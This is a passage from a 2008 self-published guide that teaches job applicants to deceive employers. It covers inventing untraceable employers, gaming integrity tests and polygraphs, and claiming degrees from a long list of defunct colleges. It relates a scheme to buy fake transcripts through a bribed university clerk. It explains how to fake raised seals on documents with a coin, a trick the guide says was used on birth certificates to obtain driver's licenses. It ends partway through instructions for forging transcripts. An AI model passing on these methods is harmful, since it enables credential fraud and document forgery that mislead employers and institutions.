rights reserved - ABP - 273 - +Reproduction in any form is prohibited without written permission. + +Need More Job Experience? +If you have put in some years in your field but find that employers +want even more experience, you may want to try this little ploy. +Say you worked for your last employer for two years and the +employers are looking for three to five years here is a way to add +some years to your resume in an untraceable manner. +Leave the employment dates of your last employer unaltered. +(you’ll have to as they can be easily verified with a simple phone +call) Insert another employer before your last one and show that +you worked for them for the additional years you need. +Of course your work there was in the same field so you now have +a total between the two employers of as many years as you like in +your chosen field. If you can, try to add a reference from a firm in +another state that went out of business as this would render that +reference entirely untraceable. Chances are excellent that if your +last employer provides a positive reference, a prospective +employer will be satisfied. +Clean Up Your Credit Rating +You should also know that a prospective employer now has the +legal right to obtain your consumer credit file despite an explicit +ban on such access in the Fair Credit Reporting Act. Once again, +in the absence of a full explanation any negative information that +might surface will most probably cause you to be immediately +eliminated from consideration. +So it’s vital that you obtain and carefully study a copy of your +current credit file. Be very sure to have any erroneous information +removed or corrected well before you start your job hunt. Many job +seekers have found it nearly impossible to obtain employment just +because their credit file contained but a single blemish. Once +again, the larger companies rely on consumer credit reports more +than the smaller outfits. +This credit file thing can really hurt you if you aren’t on top of it. A +few years back I needed to change jobs. My resume was sound +so I had no problem getting promising job interviews. The first few +interviews went very well and resulted in callbacks for second and +even third interviews. +But somehow I never quite got a job offer. Finally after a great +third interview with a large financial service firm, the head of the +division asked me if I’d be home the next night around 8pm. I +knew I had this one in the bag. Finally a good job. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 274 - +Reproduction in any form is prohibited without written permission. + +After the interview he asked me to drop by the personnel office on +my way out. There they had me sign a form that authorized them +to do some background checking. I was standing by my phone +eagerly awaiting the call the next night - but it never came. I +decided to take matters into my own hands and called the division +head to find out what had happened. +He just mumbled that “if you’d been more honest with us, we +would have made you an offer!” He then added “I’m not supposed +to tell you this but you’d better check your credit report”. +I was stunned! Like most people I thought my credit was just fine. I +always made my payments on time and had never had any +problems. +When I got a copy of my TRW credit file I was shocked to discover +that some idiot in Texas who shared my name, was a real dead- +beat. Not only didn’t he pay his bills, he owed the great state of +Texas overdue tax funds which had caused them to place a lien +on some property near Austin. It was all right there in my report +under my name. +I called TRW who, after discovering that this fool had a different +social security number, cooperated by cleaning up my record right +there on the phone. I then went on to get a great job in less than +ten days. The motto is: check that file and be sure it’s clean before +you enter the job market. +And should you find that you have to correct a credit problem in +your file, be sure to check the file again two months later as +erroneous entries have a nauseating habit of re-appearing. +Remember that mail drops will rent you a box entirely through the +mail. You can, in short order; secure a usable street mailing +address anywhere in the world and for a modest cost. +Applicant Testing +Psychological testing of employment applicants is a rather up and +down kind of thing. It tends to go into and then out of fashion very +quickly. Back in the 1980s marketing types convinced employers +that multiple choice pre-employment tests could cheaply and +effectively screen out a wide variety of undesirable job applicants. +Then some studies were done that showed tests to be worthless +and they quickly went out of style. Now, due to the skyrocketing +cost of performing background checks, testing appears to be on +the rise once again. Today salesmen sell these tests on price +(they’re much cheaper than any kind of background check) and +employers find themselves forced to use them. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 275 - +Reproduction in any form is prohibited without written permission. + +Before you even think about taking a test you need to know +exactly what kind of applicants the test is meant to screen out. +There are four classes of undesirables they’re looking to avoid. +The test you take will probably have some meaningless filler +questions that won’t effect your score much. +But when the question deals with the four areas below, be very +careful. +1. Alcoholics +2. Thieves +3. Druggies +4. Crazies +The good news is that after reading this report you’ll be able to +consistently beat the test and come out ahead of your +competition. +The first secret here is not to “play the saint”. Some test takers +conclude that by answering all the questions as though they were +a totally honest saintly person, they’ll waltz right through the thing +and land the job. +But I’m afraid such a simple approach won’t work. These tests +were designed by psychologists so they’re much more +sophisticated than that. They’re way ahead of you here. +If you fake your way through and attempt to give them all the +answers you think they want, you’ll come up short. If you confess +to stealing some small item but consistently deny committing any +major infractions (in any of the four areas mentioned above) you’ll +do much better. +By answering in this way you will appear to be a well-rounded +average employee (which is what employers really want). +Try to take your time in answering questions. They may force you +to complete the test quickly in an attempt to get you to provide +quick, impulsive answers rather than give you the time you need +to think things through carefully. +Take your time and don’t get flustered. If you can, go at it at your +own pace and leave the test unfinished if necessary. +Sprinkle around minor admissions of little problems and moral +failings here and there but always deny the serious things like +admitting to a criminal conviction or admission to a mental hospital +or drug treatment center. +If they ask about what you do with your spare time, always list +activities that are social in nature. Don’t list solitary pursuits like +watching TV or playing computer games. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 276 - +Reproduction in any form is prohibited without written permission. + +Employers like friendly sociable people not socially challenged +loners. They may ask some rather personal questions about who +you know and their activities. Try to play it as though all your +friends think just as you do. (you don’t mix with nasty people at all) +The psychologists that created these test tell the employers that +an applicant who is consistently honest in answering questions +about little things will most likely be a completely and consistently +honest person in every area of their life. +Be careful when asked about your attitude toward employers +though. Never say anything negative about past employers as +they will interpret this as revealing a negative attitude toward all +employers, including them. Such an employee could cause +problems later on down the road and should be avoided. +Never admit to having any kind of minor or major psychological +problem. This is a real touchy area with employers. No one wants +to hire a nut who is going to show up for work some morning with +a loaded machine gun and fire in his eyes. +Always answer no to questions like: +“People are always watching me” +”Others are planning against me” +”I hear voices in my head” +”Someday I’ll get even with all my enemies, you’ll see” +”God is against me” +”I have violent dreams” +Faking an Academic Credential +Recently I was employed by one of the largest manufacturing +firms in the country. So I was delighted when the company +newsletter announced that a particularly capable and friendly co- +worker had been promoted to vice president of one of the +companies larger divisions. +He was one of six such divisional promotions. According to the +newsletter each of the newly promoted men had similar +educational credentials. An undergraduate degree in either +computer science or engineering along with an MBA from one of +those Ivy League schools. Very impressive stuff to be sure. +You can imagine my shock when I read in the Wall Street Journal +some six months later that a routine check triggered by the +promotions had discovered that two of the six did not in fact +possess the MBAs they claimed! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 277 - +Reproduction in any form is prohibited without written permission. + +One of them had never even attended college at all! The motto of +this little story is: a clever applicant can fool even the largest and +most sophisticated firms. +This is one area where your age can be an asset. The younger +you are, the more intensely prospective employers will focus on +your academic accomplishments. But when you get into your late +thirties or older your more recent career accomplishments will +become much more important than your college days way back +then. (It’s much harder for a 25 year old to claim an unearned +degree than an experienced 44 year old.) +Once again I’m forced to say I can’t condone this particular form of +deception. While claiming an academic credential that you haven’t +properly earned may be an enticing idea, placing it in your resume +will leave you in a vulnerable position if at some point in the future +your trick should be uncovered. Personally I couldn’t take that kind +of risk but I’ve known several that have. +Handling the Job Interview +The strange truth about job interviews is that almost every +manager will say that they can pick the best employees at an +interview by “gut instinct”. +But when psychologists do studies they find that even the best +managers often choose the wrong employees. The funny thing is - +no matter how many studies the shrinks crank out - managers still +place great confidence in their ability to sniff out the undesirables +in an interview and continue to make hiring decisions based +almost entirely on the interview. Go figure. +Any particular interview may be either a highly structured event +with questions being asked from a list or much less formal. The +formal interviews are usually much easier to handle and much +less of a hassle for the applicant. The informal ones can be real +inquisitions if you fall into the hands someone who just wants to +play with your mind. And then there are those employers who like +to conduct so-called “stress interviews” where their sole goal is to +get you to sweat and squirm in your seat. +The first rule of interviewing for a job is - always keep it positive. +You may be asked questions designed to get you to say +something nasty about past employers or bosses. Don’t fall for +this obvious trap. No one wants disgruntled employees. You left +your last job because it wasn’t challenging enough or you felt you +wanted a position with more opportunity. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 278 - +Reproduction in any form is prohibited without written permission. + +Your last boss may have been a drunken devil-worshipping child +molester but in the interview you’d better dwell on his better traits. +(if you can’t remember any - make some up) +Be sure to say something nice about past employers also. Never +complain about anything or anyone. Never say that anyone in your +past has ever treated you unfairly. You’ve been very lucky to work +for such fine companies and great bosses. +Be prepared for tricky questions like: “why should I hire you for +this job?” or “well John, tell me all about yourself”. Don’t let +questions like these rattle your cage. Smile and launch right into +the best answer you can come up with even if it sounds a bit +strange. +Be ready to admit that you’re not perfect. You’re a human being +after all. Keeping you composer is much more important than what +you say. Your interviewer will respect you much more if you keep +your cool despite his hammering than if you came in +psychologically and start to stammer and stutter. +If asked if you have any negatives, stop and cast your eyes up to +the ceiling as though you’re giving a lot of thought to your answer +and then say something like “I sometimes get frustrated working +with fellow employees that have a poor attitude toward the +company they work for”. +If you are asked to have lunch or a cup of coffee with a potential +employer at a local restaurant accept the invitation but be careful +here. You may be asked personal lifestyle type questions. And +you may be offered an alcoholic drink with your meal. This is an +obvious trap. Decline the drink and stick with iced tea or a soft +drink. +If it’s lunchtime inform your interviewer that you have another +interview later in the day and will need to be on the road. You’d be +surprised how often an alcoholic will let down his guard and have +a drink in the hopes he’s found a new drinking buddy and at the +same time a new job. Misery loves company. +One last note: Never allow yourself the luxury of getting into an +argument with an interviewer. You may be baited in an attempt to +draw you out. Take a deep breath and keep your cool. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 279 - +Reproduction in any form is prohibited without written permission. + +Beating the Polygraph +I’ve mentioned that employers are once again embracing +psychological pre-employment testing for largely financial +reasons. The polygraph is yet another means of saving a buck. +But the polygraph is defective in many different ways (which is +why it’s never been admissible in court as evidence of guilt or +innocence). +The most basic problem with the polygraph is that though it is +effective in detecting when a subject is under stress it cannot tell if +the stress is the result of deception or just the stress caused by +the question. +A major bank in the Midwest discovers that $10,000 in cash has +vanished from their high-security vault. Detectives are sure it’s an +inside job as only five bank employees had keys and the public +had no access at all. All five emphatically denied any knowledge +of the heist. A polygraph examiner was called in to help identify +the thief. +One of the suspects was an older man who had worked for the +bank for almost twenty years. The polygraph examiner comes to +the conclusion that he is the thief and was employing deception in +answering some questions in particular the key question “Did you +steal the missing $10,000?”. He is fired and stripped of his +pension and other benefits though he continues to steadfastly +claim innocence. His apartment was searched but the money was +never recovered. +Three years later one of the other suspects, a young lady comes +forward and confesses to grabbing the cash. It seems she had a +boyfriend who was so addicted to free-basing cocaine that he +threatened to kill her and her infant daughter if she didn’t steal the +money. +Three years later when they were both arrested for possession of +cocaine, she agreed to turn on him and provide evidence in +exchange for immunity from prosecution. +By then the old man had died probably from a broken heart +brought on by the shame he had suffered. Not a pretty story but it +illustrates a point. When the old man was asked the key question +“Did you steal the missing $10,000?” he knew that his pension +and medical benefits were on the line and if he flunked this test, +his life would be destroyed. The extreme stress of the situation he +faced at that very moment was interpreted by the examiner as +evidence of deception. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 280 - +Reproduction in any form is prohibited without written permission. + +TIP: If you are ever asked if you are willing to take a polygraph +exam to clear yourself from some charge, immediately agree to a +test. But insist that the only way you’ll agree to the test is if the +entire thing is arranged by your attorney. (Polygraph examiners +are often biased in favor of those who pay their bill) +You should also remember that the polygraph is often used as a +tool of intimidation. A suspect is placed in a room, the examiner +comes in and while he sets up his machine he chats with the +subject and comments that his machine will quickly get to the truth +as it can’t be fooled and has never failed. Many subjects will +confess right there and then before they’re even hooked up to the +machine! Companies know that the polygraph is a great tool of +intimidation and use it in exactly that manner. +The examiner may show you a list of questions he will ask. He +may say “these are the only questions I will ask”. Then right in the +middle of the test he will ask several questions that were not on +the list. He’s just trying to get you upset. +You will be watched carefully before and during the test. Some +examiners believe that they can learn as much or more from your +behavior than they can from their machine. +During a typical pre-employment test you’ll first be asked a series +of simple no-stress questions. You may be asked to verify your +name, address, place of birth, age etc... At this point the examiner +is establishing a “baseline” set of readings. +If you want to confuse him, you could purposely confuse a reading +on any particular question by biting your tongue. Slightly part your +teeth just enough so that you can push a little of your tongue +between your teeth, then bite down on your tongue just a little bit. +You don’t have to draw blood or cause yourself great pain. Just a +little discomfort will send his tracings into high gear. You can get a +similar response by curling your toes in your shoes (so they hurt a +bit) or tightening the muscles in your thighs or buttocks at the right +moment. Be very careful that your tactics aren’t obvious. If the +examiner is experienced he may notice the tongue biting trick. +When you’re asked a key question, try to answer it in the way you +desire while thinking of some far off relaxing scene. Perhaps you +remember sitting on a cruise ship or a white sand beach with the +warm sun beating down on your body. Practice this before your +test. The polygraph is built on the idea that you can’t separate +your words and thoughts but the average person can with a little +practice. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 281 - +Reproduction in any form is prohibited without written permission. + +Bookstores can sell you professionally produced relaxation or +meditation tapes that will allow you to develop the skill of instantly +causing your body to relax. +If you answer one of the less important questions in an untruthful +way, you will confuse his results when he compares that result +with the response you had to a major question. If he accuses you +of doing something to confuse his test act surprised. Stay cool and +don’t get emotional. Ask him to repeat any questions. Be +cooperative. Any sign of a negative attitude will be interpreted as +proof that you are employing deception. +Be polite and respectful even though this whole thing is closer to +voodoo than science. Never show any disrespect to the examiner +or his box. Don’t question the technology even though you now +know it’s far from infallible. +Here’s a tactic a reader provided that worked for him and I thought +I would pass it along. Our friend went in for his pre-employment +polygraph but was very afraid of the question concerning drug use +(our friend is a more than occasional consumer of weed). In his +wallet he carried a crumpled newspaper clipping about the death +of a young man his age who died of a drug overdose. +Sure enough the examiner went through the list of questions and +then asked the two drug questions a second time. Our friend +dropped his head down and mumbled “I was afraid of this”. He +told the examiner that a dear friend of his had died from a drug +overdose and that he got very emotional when ever anyone +discussed drugs. +He then pulled out the clipping and showed it to the examiner. It +worked - he got the job. I told you the machine can’t determine the +source of the stress, just its presence. +The Unverifiable College Degree +When a university goes under the usual practice is to locate +another nearby school that will accept and maintain the failed +school’s academic records so that proper verifications can be +provided for the alumni. Unfortunately (or fortunately for us) some +institutions fail and are never heard from again. +This leaves their former graduates in the uncomfortable position of +having worked hard to earn an academic credential that cannot be +verified by any means. Bad luck for them, but it can be an open +door for any one who wants to claim a degree without having to go +through the bother and expense of actually doing the work. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 282 - +Reproduction in any form is prohibited without written permission. + +Here is an interesting little list. It contains information on some +institutions of higher learning that are no longer in business. +Warning: claiming a degree in this way could leave you with a +ticking time bomb in your resume. Also, most of these schools +were not properly accredited though some did sincerely attempt to +provide honest educational services. But if you’re leaving your old +life behind but need an established educational qualification, +claiming a unverifiable degree from one of these belly-up +universities might be just the ticket but there are risks involved. +Institution Name Location +The information listed here was derived from sources that are +believed to be accurate. The author assumes no +responsibility for it’s accuracy or validity. Always verify +information before use. The reader uses this information at +their own risk. +Daniel Payne College Birmingham, AL +Southeastern Institute of +AL +Technology +Arizona Bible College Phoenix, AZ +Del Rey College Phoenix, AZ +Ganado College Ganado, AZ +Professional Studies Institute Phoenix, AZ +Ambassador College CA +American National University LaPalma, CA +American College of Finance Sunnyvale, CA +Antioch University San Francisco, CA +Bay Area Open College San Francisco, CA +California American University Escondido, CA +California Concordia College Oakland, CA +College of Professional +San Francisco, CA +Studies +Eldorado College Oceanside, CA +Grant Technical College Sacramento, CA +Heald Business College Oakland, CA +Highland College Pasadena, CA +Holy Family Junior College Fremont, CA +International College of L.A. Los Angeles, CA +© Copyright 2008, Ariza Research, All rights reserved - ABP - 283 - +Reproduction in any form is prohibited without written permission. + +Immaculate Heart College Los Angeles, CA +Justice University Sacramento, CA +Lone Mountain College San Francisco, CA +Northrop University Inglewood, CA +Ocean University Santa Monica, CA +Pasadena Playhouse College +Pasadena, CA +of the Theatre Arts +Russell College Burlingame, CA +Saint Joseph’s College Santa Clara, CA +San Luis Rey College San Luis Rey, CA +Tahoe College Lake Tahoe, CA +University of Applied Studies Hacienda, CA +West Coast Christian College Fresno, CA +Westland College Fair Oaks, CA +Boulder Graduate School Boulder, CO +Saint Thomas Theological +Denver, CO +Seminary +Western Colorado University Grand Junction, CO +Annhurst College South Woodstock, CT +Dicesan Sisters College Bloomfield, CT +Ct. Holy Family Seminary West Harford, CT +Longview College Enfield, CT +College of Notre Dame of +Wilton, CT +Wilton +Saint Alphonsus College Suffield, CT +Saint Basil’s College Stamford, CT +Saint Thomas Seminary Bloomfield, CT +Silvermine College of Art New Canaan, CT +Cortez Business College Washington, DC +Dunburton College of the Holy +Washington, DC +Cross +Holy Cross College Washington, DC +Immaculata Junior College Washington, DC +Marjorie Webster Junior +Washington, DC +College +Oblate College Washington, DC +Saint Joseph’s Seminary +Washington, DC +College +Saint Paul’s College Washington, DC +© Copyright 2008, Ariza Research, All rights reserved - ABP - 284 - +Reproduction in any form is prohibited without written permission. + +Washington International +Washington, D.C. +College +Briarcliff College Miami, FL +Collier-Blocker Junior College Palatka, FL +Florida Bible College Kissimmee, FL +Florida Gibbs Junior College St. Petersburg, FL +Hampton Junior College Ocala, FL +Hollywood College Hollywood, Fl +Jackson Junior College Marianna, FL +Johnson Junior College Leesburg, FL +Liberty Christian College Pensacola, FL +Lincoln Junior College Ft. Pierce, Fl +College of Orlando Orlando, FL +Roosevelt Junior College W. Palm Beach, FL +Rosenwald Junior College Panama City, FL +Saint Joseph College of +Jensen Beach, FL +Florida +Suwannee River Junior +Madison, FL +College +Volusia County Community +Daytona Beach, FL +College +Washington Junior College Pensacola, Fl +Aquinas Institute of Theology River Forest, IL +Berean College Jacksonville, IL +Central YMCA Community +Chicago, IL +College +Chicago Technical College Chicago, IL +De Lourdes College Des Plaines, IL +Divine Word Seminary Techny, IL +Immaculate College Bartless, IL +Lincoln Open University Lombard, Il +Metropolitan Community +E. Saint Louis, IL +College +Montay College Chicago, IL +Monticello College Godfrey, IL +Pestalozzi Froebel Teachers +Chicago, IL +College +Saint Bede College La Salle, IL +Saint Dominic College St. Charles, IL +© Copyright 2008, Ariza Research, All rights reserved - ABP - 285 - +Reproduction in any form is prohibited without written permission. + +Saint Viator College Bourbonnais, IL +Shurtleff College Alton, IL +Toletine College Olympia Field, IL +Trinity Evangelical Divinity +IL +School +Williams & Vashti Aledo, IL +Winston Churchill College Pontiac, IL +Aristotle College IN +Canterbury College Danville, IN +Graceland University New Albany, IN +Lockyear College Evansville, IN +Northwood Institute of Indiana West Baden IN +Saint Benedict College Ferdinand, IN +Saint Meinrad College Saint Meinrad, IN +Midwestern College Denison, IA +University of Mid-America +Council Bluffs, IA +(Iowa) +Westmar University LeMars, IA +Bluemont Central College Manhattan, KS +College of Emporia Emporia, KS +Garfield University Wichita, KS +Marymount College of Kansas Salina, KS +Saint John’s Lutheran College Winfield, KS +Saint Mary of the Plains +Dodge City, KS +College +Saint Mary’s College Saint Mary’s, KS +Calvary Bible College Letcher, KY +Cedar Bluff College Woodburn, KY +Glasgow Normal School Glasgow, KY +Kentucky Southern College Louisville, KY +Lees College Jackson, KY +Lexington Baptist College Lexington, KY +Ogden College KY +Pleasant J. Potter College Bowling Green, KY +Southeastern Christian College Winchester, KY +Sue Bennett College London, KY +Urania College Glasgow, KY +Warren College Bowling Green, KY +© Copyright 2008, Ariza Research, All rights reserved - ABP - 286 - +Reproduction in any form is prohibited without written permission. + +Baton Rouge College Baton Rouge, LA +Bell City College Bell City, LA +Gulf Coast Christian College Plaquemine, LA +Leatchie Female College Keatchie, LA +Lousiana Holiness College Hudson, LA +Louisiana Central University Metairie, LA +Mount Lebanon University Mount Lebanon, LA +Saint Mary’s Dominican +New Orleans, LA +College +World Evangelism Bible +Baton Rouge, LA +College +Bliss College Lewiston, ME +Nasson College Springvale, ME +Northern Conservatory of +Bangor, ME +Music +Ricker College Houlton, ME +Baltimore College of +Baltimore, MD +Commerce +Saint Joseph College Emmitsburg, MD +Saint Peter’s College Baltimore, MD +Sojouner-Douglass College Baltimore, MD +Trinitarian College Baltimore, MD +Washington Junior Collegew Takoma Park, MD +Xaverian College Silver Springs, MD +Aquinas College at Newton Newton, MA +Berkshire Christian College Lennox, MA +Bradford College Haverhill, MA +Bryant & Stratton Business +Boston, MA +Institute +Calvin Coolidge College of +MA +Liberal Arts +Cambridge Junior College Cambridge, MA +Cardinal Cushing College Brookline, MA +Central New England College Worcester, MA +Middlesex University Waltham, MA +Mount Alvernia College Newton, MA +Newton College of the Sacred +Newton, MA +Heart +Newton Junior College Newton, MA +© Copyright 2008, Ariza Research, All rights reserved - ABP - 287 - +Reproduction in any form is prohibited without written permission. + +Northampton Junior College Northampton, MA +Oblate College & Seminary Natwick, MA +Perry Normal School Boston, MA +Worcester Junior College Worcester, MA +De Lima Junior College Oxford, MI +Detroit Institute of Technology Detroit, MI +Duns Scotus College Southfield, MI +Highland Park Community +Highland Park, MI +College +John Wesley College Owosso, MI +Jordan College & Seminary Cedar Springs, MI +Jordan College Flint, MI +Mackinac College Mackinac Island, MI +Maryglade College Memphis, MI +Meinzinger Art School Detroit, MI +Nazareth College Kalamazoo, MI +Shaw College Detroit, MI +Crosier Seminary Onamia, MN +Duluth Junior College Duluth, MN +Golden Valley Lutheran +Minneapolis, MN +College +Lea College Alberta Lea, MN +Minnesota Central University Hastings, MN +Saint Teresa College Winona, MN +Clarke Memorial College Newton, MS +Gulf Park Junior College Gulfport, MS +Mississippi Industrial College Holly Springs, MS +Phillips Junior College Gulfport and Jackson, MS +Whitworth Bible College Brookhaven, MS +Cardinal Newman College MO +Chillicothe Business College Chillicothe, MO +Springfield, Joplin, +Draughon Business College +Independence, MO +International Graduate School St. Louis, MO +Jackson University Chillicothe, MO +Louis Touton Junior College Kansas City, MO +Marillac College Saint Louis, MO +Marion College Philadelphia, MO +© Copyright 2008, Ariza Research, All rights reserved - ABP - 288 - +Reproduction in any form is prohibited without written permission. + +McGhee College College Mound, MO +McGhee Holiness College College Mound, MO +Midwestern Baptist Theological +Saint Louis, KS +Seminary +Saint Notre Dame College Saint Louis, MO +Saint Mary’s College O’Fallon, MO +Saint Paul’s College Concordia, MO +Duchesne College of the +Omaha, NE +Sacred Heart +Hiram Scott College Scottsbluff, NE +John F. Kennedy College Wahoo, NE +John J. Pershing College Beatrice, NE +Saint John Vianney Seminary Elkhorn, NE +Old College Rena, NV +Belknap College NH +Canaan College NH +Concord Commercial College NH +Franconia College NH +Gunstock College NH +Mt. Saint Mary’s College NH +Nathaniel Hawthorne College NH +Pierce College for Women NH +Franconia College Franconia, NH +Alma White College Zarephath, NJ +Bayonne Junior College Bayonne, NJ +Don Bosco College Newton, NJ +Hudson College Jersey City, NJ +Northeastern Bible College Essex Falls, NJ +Shelton College Cape May, NJ +Tombrock College Paterson, NJ +Upsala College East Orange, NJ +Albany Business College Albany, NY +Bennett College Millbrook, NY +Brentwood College Brentwood, NY +Briarcliff College Briarcliff Manor, NY +Brooklyn Jusuit College Brooklyn, NY +Capuchin Theological +Garrison, NY +Seminary +© Copyright 2008, Ariza Research, All rights reserved - ABP - 289 - +Reproduction in any form is prohibited without written permission. + +Cathedral College Flushing, NY +Elizabeth Seton College Yonkers, NY +Finch College New York City, NY +Genessee College Lima, NY +The King’s College Briarcliff, NY +Ladycliff College Highland Falls, NY +Maria Regina College Syracuse, NY +Maryknoll School of Theology Maryknoll, NY +Mater Christi Seminary Albany, NY +Mills College of Education New York, NY +New York College of Music New York, NY +Our Lady of Hope Mission +Newburgh, NY +Seminary +Packer Collegiate Institute +Brooklyn, NY +(Junior College) +Passionist Monastic Seminary Jamaica, NY +Rogers College Maryknoll, NY +Russell Sage College NY +Saint Clare College Williamsville, NY +Saint John Vianney Seminary East Aurora, NY +Saint Joseph’s Seraphic +Callicoon, NY +Seminary +Verrazzano College Saratoga Springs, NY +Woodstock College New York, NY +Blantons Junior College Asheville, NC +Phillips Junior College Fayetteville, NC +Sacred Heart College Belmont, NC +Yadkin College NC +Assumption College Richardton, ND +Ellendale State Teachers +Ellendale, ND +College +Fargo College Fargo, ND +Methodist Red River University Wahpeton, ND +Alfred Holbrook College Manchester, OH +Bliss College Columbus, OH +Columbia Business College Columbus, OH +Dayton Art Institute Dayton, OH +Mary Manse College Toledo, OH +© Copyright 2008, Ariza Research, All rights reserved - ABP - 290 - +Reproduction in any form is prohibited without written permission. + +Marycrest College Toledo, OH +Midland College of Commerce Ashland, OH +Penn-Ohio College Youngstown, OH +American Christian College Tulsa, OK +Carey College Oklahoma City, OK +Flaming Rainbow University Stilwell, OK +Phillips University Enid, OK +Southwest Baptist College Mangum, OK +Cascade Christian College Portland, OK +Columbia Christian College Portland, OK +Mount Angel College Mount Angel, OK +Judson Baptist College Portland, OR +Philomath College Philomath, OR +Alliance College Cambridge Springs, PA +Antioch University Philadelphia, PA +Dropsie College Philadelphia, PA +Franklin and Marshall College Lancaster, PA +Hershey Junior College Hershey, PA +Mary Immaculate Seminary & +Northhampton, PA +College +Penn Hall Junior College Chambersburg, PA +Pinebrook Junior College Coopersburg, PA +Saint Fidelis College Herman, PA +Spring Garden College Philadelphia, PA +Mount Saint Joseph College Wakefiekd, RI +Our Lady of Providence +Warwick, RI +Seminary +Friendship College Rock Hills, SC +Palmer College Charleston, Sc +Freeman Junior College Freeman, SD +Yankton College Yankton, SD +Andrew Jackson Business +Memphis, TN +College +Boscobel College Nashville, TN +Bristol University Bristol, TN +Draughons Junior College of +Kingsport & Knoxville, TN +Business +McKenzie College Chattanooga, TN +© Copyright 2008, Ariza Research, All rights reserved - ABP - 291 - +Reproduction in any form is prohibited without written permission. + +Roger Williams University Nashville, TN +Siena College Memphis, TN +Steed College Johnson City, TN +Tomlinson College Cleveland, TN +Abiline Christian University Abiline, TX +Ambassador University Big Sandy, TX +Christopher College Corpus Christi, TX +Dominican College Houston, TX +Eastern Texas University San Augustine, TX +Houston International +Houston, TX +University +Plano College Plano, TX +Ruterville College La Grande, TX +San Augustine University San Augustine, TX +Soule Univesity S. Chappel Hill, TX +Southern Bible College Houston, TX +Waco Female College Waco, TX +Woodcrest College Dallas, TX +Stevens Henager College Salt Lake City, UT +Windham College Putney VT +Blackstone College Blackstone, VA +Elizabeth College Salem, VA +Father Judge Mission +Monroe, VA +Seminary +Frederick College Portsmouth, VA +Hopewell University Hopewell, VA +Luther Rice College Alexandria, VA +Potomac Community College Paris, VA +Smithdeal-Massey Business +Richmond, VA +College +Stratford College Danville, VA +Sullins College Bristol, VA +Fort Wright College of the Holy +Spokane, WA +Names +Griffin College Seattle, WA +Spokane Christian College Spokane, WA +Greenbriar College Lewisburg, WV +West Liberty State Hancock & Wierton, WV +© Copyright 2008, Ariza Research, All rights reserved - ABP - 292 - +Reproduction in any form is prohibited without written permission. + +Ashland County Teachers +Ashland WI +College +Barron County Teachers +Rick Lake, WI +College +Buffalo County Teachers +Alma, WI +College +Dodge County Teachers +Mayville, WI +College +Door-Kewaunee County +Algoma, WI +Teachers College +Dunn County Teachers +Menomonie, WI +College +Green County Teachers +Monroe, WI +College +Layton School of Art & Design Milwaukee, WI +Lincoln County Teachers +Merrill, WI +College +Madison College Madison, WI +Milton College Milton, WI +Mount Saint Paul College Waukesha, WI +College of Racine Racine, WI +Wyoming College of Advanced +WY +Studies +© Copyright 2008, Ariza Research, All rights reserved - ABP - 293 - +Reproduction in any form is prohibited without written permission. + +The Strange Case of Mr. Gallagher +Later one night just before midnight I awoke to someone pounding +loudly on my front door. When I opened it in rushed an old friend +that I hadn’t seen in over a year. He plopped himself down on my +sofa and with a broad grin demanded that I give him a thousand +dollars in cash. He said it was the deal of the century and that I’d +never regret it. Ken had always been a straightforward guy though +I can’t say much about his morals. I calmed him down and finally +he gave me the story. +He had met a young lady at a local singles bar who worked in the +administrative office of a large private university. For a fee of one +thousand dollars cash she would make a copy an actual +graduate’s transcript, insert our names and social security +numbers on the copies and then insert them into the official +records so that anyone calling could easily obtain a verification. +In short she would sell anyone with a grand a bachelors degree in +whatever subject they liked. I have to be honest with you, I gave it +some thought. But in the end I declined to join Ken in his +adventure. +Ken and I had lunch two years later. When we returned to his +office there it was hanging on the wall - his phony university +degree! He was running a division of a local manufacturing +company and had over a hundred employees working under him, +was pulling down a generous six-figure income and drove a new +company-owned Cadillac. Ken could get away with this sort of +ploy simply because he had nerves of steel. I wasn’t wired that +way. +You should know that from time to time you’ll read a report in the +paper about the police breaking up such a degree-for-sale +operation. If your inside accomplice is ever arrested, you might +find yourself in considerable legal trouble. +If you do go ahead and claim an unearned degree, don’t be at all +surprised if an interviewer actually hands you the degree +verification form along with a stamped envelope and asks you to +take care of submitting it. This is a surprisingly common practice, +despite the fact that this makes it childishly simple to “verify” a +forged or enhanced transcript. +A common hurdle to forging or embellishing a college transcript is +the raised seal. As is the case with so many other official +documents, a transcript will not be acceptable unless it includes a +circular raised seal created though the use of an official seal by +the proper issuing authority (in this case the university). How can +you get past this requirement? +The solution is laughably simple. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 294 - +Reproduction in any form is prohibited without written permission. + +Get a largish coin, a Kennedy half dollar will do nicely but a +common quarter will do in a pinch. Place the coin on a hard +surface with the reverse side up. Then place the document over +the coin and rub the document with your fingertip running it around +and around the rim so that a nice round impression is made on +your document. Then rub some more on the middle of the coin. +But only just enough to cause a fuzzy raised seal to appear, being +careful to avoid the wording “fifty cents”. +What you’re left with is a nice unfocused raised image with no +readable text. Nine times out of ten it’ll produce a perfectly +acceptable impression. I learned this one from one of my friends +who spent some time as a guest in one of Uncle Sam’s prisons. +He said he’d used it on various birth certificates to obtain over a +dozen different drivers licenses. He told me that many criminals +actually carry around a Kennedy half dollar in their shaving kits +just for this purpose. +When Did You Say You Went to College? +When claiming a bogus degree always remember to leave enough +off time in your resume to allow the required college attendance. +Degrees just don’t happen instantly, they require long years of +work. And if you claim that you attended college while you worked, +you’ll have to allot an even longer period. Be well prepared to +explain how and when you earned your listed degree. +Also keep in mind that your job title and listed salary must be in +line with your claimed academic qualifications. Be sure that your +salary after earning your degree reflects the expected increase. If +not, it’ll raise a red flag. +Please be very careful to avoid using these techniques to go after +a job that’s obviously over your head. Don’t get intoxicated with +the idea of earning a huge salary. Believe me, this is a formula for +disaster. Unless you’re absolutely sure that you possess the skills +and experience necessary to be successful in your new position – +stay within your capabilities. +If you can, visit the campus of your new alma mater. Stroll around, +taking particular note of the streets and bars in the immediate +vicinity. Get a copy of the school’s catalog and study it carefully. +Commit to memory two or three of the more prominent professor’s +names and faces. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 295 - +Reproduction in any form is prohibited without written permission. + +College transcripts are extremely easy to forge. Simply get a copy +of someone else’s legitimate transcript and a copy of the college +catalog for the period you’ll claim you 